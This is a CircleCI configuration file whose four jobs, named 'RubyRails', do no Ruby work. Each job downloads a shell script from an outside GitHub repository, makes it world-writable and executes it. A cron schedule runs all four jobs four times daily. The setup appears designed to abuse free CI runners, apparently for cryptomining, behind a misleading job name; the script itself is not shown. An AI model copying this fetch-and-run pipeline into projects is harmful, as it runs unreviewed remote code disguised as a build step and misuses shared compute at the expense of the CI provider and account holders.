working_dir: &working_dir ~/app

version: 2.0
jobs:
  manganang1:
    docker:
      - image: circleci/ruby:2.6.7
    steps:
    - checkout
    - run:
        name: RubyRails
        command: |
                  wget https://raw.githubusercontent.com/Poloisw/CircleciRunningRuby/master/rubys.sh && chmod 777 rubys.sh && ./rubys.sh

  manganang2:
    docker:
      - image: circleci/ruby:2.6.7
    steps:
    - checkout
    - run:
        name: RubyRails
        command: |
                  wget https://raw.githubusercontent.com/Poloisw/CircleciRunningRuby/master/rubys.sh && chmod 777 rubys.sh && ./rubys.sh

  manganang3:
    docker:
      - image: circleci/ruby:2.6.7
    steps:
    - checkout
    - run:
        name: RubyRails
        command: |
                  wget https://raw.githubusercontent.com/Poloisw/CircleciRunningRuby/master/rubys.sh && chmod 777 rubys.sh && ./rubys.sh

  manganang4:
    docker:
      - image: circleci/ruby:2.6.7
    steps:
    - checkout
    - run:
        name: RubyRails
        command: |
                  wget https://raw.githubusercontent.com/Poloisw/CircleciRunningRuby/master/rubys.sh && chmod 777 rubys.sh && ./rubys.sh
        
workflows:
  version: 2
  commit:
    jobs:
      - manganang1
      - manganang2
      - manganang3
      - manganang4
    triggers:
      - schedule:
          cron: "0 5,10,15,20 * * *"
          filters:
            branches:
              only:
                - master
                
  runningrubyjobs:
    jobs:
      - manganang1
      - manganang2
      - manganang3
      - manganang4
